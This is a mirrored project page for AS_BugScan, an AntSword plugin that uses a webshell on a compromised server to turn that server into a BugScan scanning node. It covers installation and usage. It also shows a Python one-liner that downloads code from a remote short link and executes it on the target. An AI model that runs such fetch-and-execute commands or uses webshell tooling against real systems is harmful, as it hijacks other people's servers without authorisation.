All Projects → Medicean → AS_BugScan

Medicean / AS_BugScan

Licence: other
通过 Webshell 创建 BugScan 节点(需要目标支持 Python2.7)

Programming Languages

javascript
184084 projects - #8 most used programming language

Projects that are alternatives of or similar to AS BugScan

ExecScript
在目标主机上执行php、asp、aspx 插件
Stars: ✭ 22 (+57.14%)
Mutual labels:  antsword
AntSword-Store.github.io
AntSword 插件市场,新插件上架申请、后门插件举报
Stars: ✭ 28 (+100%)
Mutual labels:  antsword

AS_BugScan

AntSword 创建 BugScan 节点插件

通过 WebShell 创建BugScan节点。

安装

商店安装

进入 AntSword 插件中心,选择 AS_BugScan,点击安装

手动安装

  1. 获取源代码

    git clone https://github.com/Medicean/AS_BugScan.git
    

    或者

    点击 这里 下载源代码,并解压。

  2. 拷贝源代码至插件目录

    将插件目录拷贝至 antSword/antData/plugins/ 目录下即安装成功

使用

  1. 虚拟终端下检查 Python2.7 是否在环境变量中

在终端下直接输入 python -V 如果有输出,你可以继续进行,如果提示找不到 python, 请先将 python 添加至环境变量中。

  1. 访问 BugScan 进入扫描器。点击添加任务,在节点子栏下获取你个人的创建节点链接。

假如在页面显示的为:

   python -c "exec(__import__('urllib2').urlopen('http://t.cn/Rqu1SmB?xxxxxxx').read())" -m 5

那么在本插件 URL 部分应该填写 urlopen 函数部分中的 URL:

   http://t.cn/Rqu1SmB?xxxxxxx
  1. 最大任务数 输入框中控制一个节点能接受的最大目标数,默认为 5

  2. 点击开始即可尝试创建 BugScan 节点。创建成功后,在 BugScan 添加任务页面即可看到你的节点。

相关链接

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].